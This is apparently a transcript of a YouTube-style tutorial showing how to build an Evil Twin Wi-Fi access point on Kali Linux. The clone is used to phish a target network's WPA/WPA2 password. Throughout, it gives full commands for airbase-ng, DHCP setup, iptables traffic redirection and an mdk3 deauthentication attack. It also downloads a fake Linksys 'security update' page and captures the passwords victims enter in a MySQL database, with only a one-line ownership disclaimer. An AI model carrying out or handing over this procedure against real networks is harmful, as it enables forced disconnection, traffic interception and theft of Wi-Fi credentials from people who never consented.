What's up everyone, this is Chris, and today I'm going to teach you how to create an Evil Twin access point on a Kali Linux virtual machine. In addition, I'm going to show you how to use the Evil Twin access point in combination with some social engineering techniques to obtain a target's WPA or WPA2 password. Now to complete this tutorial, you will need to have a USB network adapter that supports monitor mode. If you don't already have a USB network adapter that supports monitor mode, the network adapter that I always recommend for you is the Alpha AWUS036NHA. And if you want to buy this network adapter, I encourage you to head over to the Rokland Technologies store at rokland.com. That's ROKLAND.com. They're one of the few authorized Alpha network retailers. They provide excellent customer service and their prices are competitive and reasonable. So if you're interested, check the video description for a link. Now, based on the high volume of requests that I've received for this tutorial, I think it's fair to assume most of you understand how the Evil Twin access point works. But for those of you who don't know, let me explain what we're going to do for this tutorial. First, we're going to create an Evil Twin access point. And it's called an Evil Twin because it's a clone of an authentic access point. And what we do is we find a wireless network that we want to target. We copy that network's identifying information such as its name and its MAC address, and then we use that information to create our own wireless network. Now keep in mind this should only be performed on wireless networks that you own. If you don't have two wireless networks, I suggest you ask a neighbor or a friend if you can use theirs to practice on. Now, when a client connects to the Evil Twin network, they won't be able to distinguish between the authentic network and the Evil Twin network. Then when the client opens their web browser, we're going to redirect them to a security update page for their router, which will prompt them to enter their WPA or WPA2 password. When the client enters his or her WPA password, the password is going to be stored in a MySQL database, which we'll create in a few moments. So that's everything we're going to do for this tutorial. Now let's go ahead and get started. The first thing that we need to do is we need to connect to the internet, and we're going to accomplish this by sharing our host operating system's internet connection with our Kali Linux virtual machine. And I've chosen to do it this way because it will eliminate the need for a second USB network adapter. So let's move over to our host operating system. And you can see that I'm using Mac OS X, but keep in mind that it doesn't matter what type of operating system you're using, just as long as you can connect to the internet with it. Now go ahead and open your network manager and then find a wireless network to connect to. I'm going to connect to my home network, and I'll give that a moment to connect. Okay, it's done. So now that we've connected to the internet on our host operating system, we need to share it with our Kali Linux virtual machine. So let's move back over to Kali Linux. And in the top menu bar, we need to open the virtual machine menu. And then we're going to expand the network adapter menu. And here we need to set our network adapter to bridged auto detect. Once you've made that setting, you can go ahead and allow the virtual machine menu to collapse. And now we can use that virtual network adapter to establish an internet connection through our host operating system. So let's open our network manager. And I'm using the WPA network manager, but you can use whatever network manager you have. And in your network manager, you need to find the option that says Wire Network and then click Connect. And while that's connecting, I want to point out that if you're using the default network manager and you're having issues with the wired connection, I recommend installing the WPA network manager. And I have a tutorial that will show you how, so check the video description for a link if you need to do that. So now that we have an internet connection, we need to install DHCP server. And for those of you who don't know what DHCP server is, a DHCP server is used to assign an IP address within a specific range to clients who connect to an access point. And in this case, we'll use it to assign an IP address to anyone who connects to our Evil Twin access point. So we can go ahead and close out our network manager. And now we need to open a terminal. And in the terminal, we're going to type apt-get space install space DHCP3 tac server and then press enter. And I've already installed DHCP server, so it's going to reflect that, but you may receive a prompt asking you to confirm the installation. Just type Y and then press enter and give it a moment to finish installing. Now moving on, we need to configure our DHCP server. So in the terminal, let's type nano space /etc /dhcpd.conf and then press enter. And you should have a blank DHCP3 configuration file like I do. If it's not blank, simply delete the existing contents before moving on. And when you're ready, let's start entering our configurations. On the first line, we need to type authoritative, semicolon, and then press enter to move down to the next line. And then type default, tac lease, tac time, space 600, semicolon, and then press enter to move down to the next line. And type max, tac lease, tac time, space 7200, semicolon, and then press enter to move down a line. And then type subnet, space 192.168.1.128, space netmask, space 255.255.255.128, space forward-facing curly bracket, and then press enter to move down a line. And type option, space subnet, tac mask, space 255.255.255.128, semicolon, and then press enter to move down a line. And type option, space broadcast, tac address, space 192.168.1.255, semicolon, and then press enter to move down a line. And type option, space routers, space 192.168.1.129, semicolon, press enter to move down a line. And type option, space domain tac name, tac servers, space 8.8.8.8, semicolon, press enter to move down a line. And then type range, space 192.168.1.130, space 192.168.1.140, semicolon, and then press enter to move down a line. And then type a backwards facing curly bracket. And that's everything that we need to enter. So now we need to save and close the file. First, we're going to press the Control and X keys, and then we'll press the Y key, and finally we'll press the Enter key. Now we need to download the security update page that I created for this tutorial. And this is the web page that the client will see when they open their web browser. And what I've done is I've created a sample web page that imitates a security update for a Linksys router. Now in a real world penetration test, the sample page that I'm providing would most likely be irrelevant. If you're pen testing a company that uses a captive portal or a landing page, for example, you would want to deploy a web page that resembles that company's captive portal. If you're pen testing a network that uses Netgear, D-Link, Cisco, or whatever, you want to produce a web page that identifies with those particular manufacturers. So let's go ahead and move on. So in the terminal, we need to type cd space /var/www and then press enter. And then type rm space index.html and then press enter. And then type wget space http://hackthisTV.com/eviltwin.zip and then press enter. And we'll give it a moment to download the eviltwin.zip file. Okay, and now that that's done, we need to unzip it. So let's type unzip space eviltwin.zip and then press enter. And then type rm space eviltwin.zip and press enter. And now we're ready to start our Apache web server, which will allow us to host our security update web page. But first, I'm going to clear my terminal to make it easy to see. So I'm going to type clear and then press enter. And now we need to type /etc/init.d/Apache2 space start and then press enter. And now we need to start MySQL. So let's type /etc/init.d/MySQL space start and then press enter. Okay, and now that MySQL is running, we need to log into it and create a database, which is where we'll store the WPA password that our client enters into the security update page. So let's type MySQL space tacu space root and then press enter. And you should have the MySQL prompt like I do. First, we're going to create a database named EvilTwin. So let's type create space database space evil_twin semicolon, and then press enter. And now we need to create a table with some columns which will represent the data that the client enters in the password fields on our security update page. So to move into our new database, we need to type use space evil_twin and then press enter. And now we're going to type create space table space WPA_keys parentheses password space VARCHAR parentheses 64 close parentheses comma space confirm space VARCHAR parentheses 64 close parentheses another close parentheses semicolon, and then press enter. And in case you were wondering, that command created a table called WPA_keys, which contains two columns. One is called password and the other is called confirm. The 64 represents the maximum number of characters that can be stored in the column. And we use 64 because a WPA password can contain up to 64 characters. So now moving on, we need to find our virtual network adapter's interface name. And we need to find our local IP address because we're going to be using them in future commands. So let's open up a new terminal, and we can leave the MySQL terminal open because we'll be accessing that a little bit later in the tutorial. And in the new terminal, we need to type IP space route and then press enter. And go ahead and find your virtual network adapter's interface name and your local IP address. Your interface name is shown here, and your local IP address is shown here. And let's open up a blank notepad so we can keep track of this information. And go ahead and represent these items the way that I show you so we can easily refer to them later on without confusion. We'll call our virtual network adapter's interface name our wired interface. And mine is ETH0. And then we'll call our local IP address our local IP. And mine is 192.168.0.6. And now that we've made note of that information, we need to find the name of our USB network adapter's interface name. So go ahead and connect your USB network adapter if you haven't already done so. And then let's move back into the terminal. And in the terminal, we need to type airmon-ng and then press enter. And go ahead and find your USB network adapter's interface name. And your interface name is shown here. And then let's make note of that in our notepad. We'll call it our wireless interface. And mine is WLAN0. And now we need to create a monitor interface. So let's move back into the terminal. And in the terminal, we need to type airmon-ng space start space and then enter the name of your wireless interface. Mine is WLAN0. And then press enter. And go ahead and find your monitor interface name, and the monitor interface is shown here. And then let's make a note of that in our notepad, and we'll call it our monitor interface. And mine is mon0. And now we're going to use Airodump to find the wireless network that we want to clone. But first I'm going to show you something that will allow us to identify the type of router that the target network is using. So let's move back into the terminal. And I'm going to go ahead and clear my terminal, so type clear and then press enter. And then we need to type Airodump-ng OUI update and then press enter. And give it a moment to download the OUI file. Okay, and this just provided us with a list of manufacturers and their known MAC address formats. And what this does is it allows Airodump to compare the discovered network's BSS IDs to the list and display the corresponding manufacturer for us in the scan results. So moving on, let's go ahead and start our scan. To do this, we need to type Airodump-ng space tac uppercase M space and then enter the name of your monitor interface. Mine is mon0 and then press enter. And when you find the wireless network that you want to target, you need to press the Control and C keys to stop the scan. And now we need to make note of the target's ESSID the channel number, and the target's BSSID. So let's move back into our notepad. And we're going to call these items target ESSID, target channel number, target BSSID. So go ahead and refer back to your terminal and write down the target's ESSID. Mine is HackDroid, and make sure you use any uppercase, lowercase as necessary. And then write down the channel number. Mine is using 6. And then for the BSSID, I recommend simply copying and pasting to ensure that you don't make any errors. Go ahead and copy that. And to copy text from the terminal without using right click, you can simply press the Control, Shift, and C keys to copy any text. Same with if you want to paste text, you can press the Control, Shift, and V keys. So we'll go ahead and paste that into the notepad. And now that we have our target's information, we can create an evil twin. So let's move back into the terminal. And I'm going to clear my terminal again. So type clear and then press enter. And now we need to type Airbase -ng space -e space and then enter the target's ESSID. Mine is HackDroid with an uppercase H and an uppercase D space -c space and then enter the target's channel number. Mine is 6 space uppercase P space and then enter the name of your monitor interface. Mine is Mon0 and then press enter. Okay, and now that our evil twin access point is up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface. And just for the sake of clarification, the tunnel interface is called AT0 and it was created for us when we created our evil twin access point with Airbase. So let's go ahead and open up a new terminal, but don't close the Airbase terminal or the MySQL terminal. And in the terminal, we need to type ifconfig space AT0 space 192.168.1.129 space netmask space 255.255.255.128 and then press enter. And now we need to add a routing table and enable IP forwarding so we can forward traffic to and from our evil twin access point. So let's type route space add space tacnet space 192.168.1.128 space netmask space 255.255.255.128 space GW space 192.168.1.129 and then press enter. And now we need to type echo space 1 space forward arrow space /proc/net/IPv4/IP_forward and then press enter. Now we need to create some IP tables rules, and these rules determine how network traffic is handled. First, we're going to create a rule for managing traffic that needs to go to our wired interface, which is our internet source. So let's type iptables space table space nat space append space post routing in all uppercase space out interface space and then enter the name of your wired interface. Mine is ETH0 space j space masquerade in all uppercase and then press enter. Now we need to create a rule for managing traffic that is going into our tunnel interface. So let's type iptables space append space forward all uppercase space in interface space AT0 space j space accept in all uppercase and then press enter. Now we need to create a rule that allows TCP connections on port 80 and forwards them to our web server. So we need to type iptables space t space nat space uppercase A space pre-routing in all uppercase space p space TCP space tac tac dport space 80 space tac j space dnat in all uppercase space tac tac 2 tac destination space, and then we need to enter our local IP address. Mine is 192.168.0.6 colon 80, and then press enter. And for the final rule, we need to create a rule that allows us to provide network address translation. And to do this, we need to type iptables space tac t space nat space tac uppercase A space post routing in all uppercase space tac j space masquerade in all uppercase, and then press enter. And now that we have IP tables set up, we need to point to our DHCP configuration file and start our DHCP server. So let's type DHCP space tac cf space /etc /dhcpd.conf space tac pf space /var /run /dhcpd.pid space at0, and then press enter. And then type /etc /init.d /isc tac dhcp tac server space start, and then press enter. And that reflects that DHCP server has started, and it started successfully. Now for the final step, we need to force the target network's clients to connect to our evil twin access point. And to accomplish this, we need to disconnect the clients from the target network by performing a deauthentication attack. And keep in mind there are various ways to do this, but for this tutorial we're going to use MDK3. So first we need to create a blacklist file that contains the target's MAC address or BSSID. So let's type echo space, and then we need to enter the target's BSSID. So just go ahead and copy that out of your notepad and then paste it into the terminal. Space / space blacklist, and this is simply the name of the blacklist file. I suggest just sticking with blacklist, simple, and then press enter. And then to start the deauthentication attack, we need to type MDK3 space and then the name of your monitor interface. Mine is mon0 space d space tac b space blacklist space tac c space and then the target's channel number. Mine is 6, and then press enter. And now I'm going to move over to the computer that I'm using to simulate a victim. And you can see that my victim computer is still connected to the authentic Hackdroid network. If the deauthentication attack is successful, my victim computer should lose its connection any moment. So we'll just watch and see as that happens. And I'll show you here too that it is indeed connected to a secure network. Okay, and my victim computer has just lost its connection. Now what's going to happen is my victim computer will try to reestablish the connection that it just lost. However, because we've suspended the authentic network, it should connect to the evil twin network instead. So let's refer back over to the Airbase terminal, and here we're going to watch for the connection. Okay, and it's showing there that someone is connected to our evil twin access point. So I'm going to move back over to my victim computer. And now we would anticipate that the victim is going to open their web browser. So as a victim, that's exactly what I'm going to do. I'm going to open Firefox, and I'm just going to try to go to google.com. And you can see that I've been brought to a security update page. As a Linksys user, I want to make sure that my router is current on all of its updates, particularly its security updates. So I'm going to enter my WPA password as the Linksys update is requesting. And I've created some fictitious one called Gravy Train 123. And then I'm going to confirm that password. And then I'm going to click Update. Okay, so now let's move back over to our MySQL terminal. And we're going to check to see if we were able to capture that WPA password. So in the terminal, we need to type use space evil_twin and press enter. And then we're going to type select space asterisk space from space WPA underscore keys semicolon, and then press enter. And you can see there that the client's password was stored in our MySQL database. It shows the password gravytrain123 and then the confirmation as gravytrain123. Had the client entered mismatching passwords, they would have been brought to an error page prompting them to re-enter their passwords because they didn't match. Had they clicked the cancel button, they would have been brought to a page that ensures them how important the security update is and that it's for their own good and that they will not be able to browse the internet until they perform the update. So I recommend you guys play around with that a little bit and get an idea of how it works. I apologize, for the spelling errors and things like that, but it was just something I threw together really quick for the tutorial. So that's it. That's how you create an evil twin access point and set up a web page that's going to capture WPA passwords. I hope you guys enjoyed this tutorial, and please don't forget to like, comment, and subscribe.